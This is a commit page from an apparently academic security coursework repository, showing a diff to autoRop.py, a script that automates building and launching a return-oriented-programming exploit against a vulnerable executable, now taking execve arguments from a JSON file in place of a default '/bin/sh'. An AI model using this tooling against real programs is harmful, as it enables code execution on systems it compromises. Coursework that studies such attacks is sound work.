jack/security-cw
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add execve arguments

Browse Source 
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno
2020-11-28 17:42:09 +00:00
parent b38616fd71
commit f92b6e9ccd
5 changed files with 66 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
autoRop.py
View File

@ -4,6 +4,7 @@ import math
import os
import subprocess
import sys
import json
from contextlib import redirect_stderr
from pwnlib.context import context
@ -35,15 +36,16 @@ print(r'''
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
arg_parser.add_argument("--rop_exec", metavar="rop_exec", default="/bin/sh", type=str, help="The path to the executable the ROP should run")
arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
args = arg_parser.parse_args()
exec_file = args.exec_file
rop_file = args.rop_file
rop_exec = args.rop_exec
rop_exec_file = args.rop_exec_file
min_payload = args.min_payload
max_payload = args.max_payload
run = args.run
@ -96,15 +98,18 @@ result = subprocess.run(
"--silent",
"--paddingLen", str(offset),
"--ropFile", rop_file,
"--execPath", rop_exec
"--execFile", rop_exec_file,
],
stdout = subprocess.PIPE
)
with open("log/ropgadget.log", "wb") as f:
f.write(result.stdout)
print(f" └─[🤩] All done! The ROP input is saved to {rop_file}!")
if run:
pwnlibexit._run_handlers()
print()
print(f"[ Run Program : ./{exec_file} {rop_file} ]")
os.execv(exec_file, [exec_file, rop_file])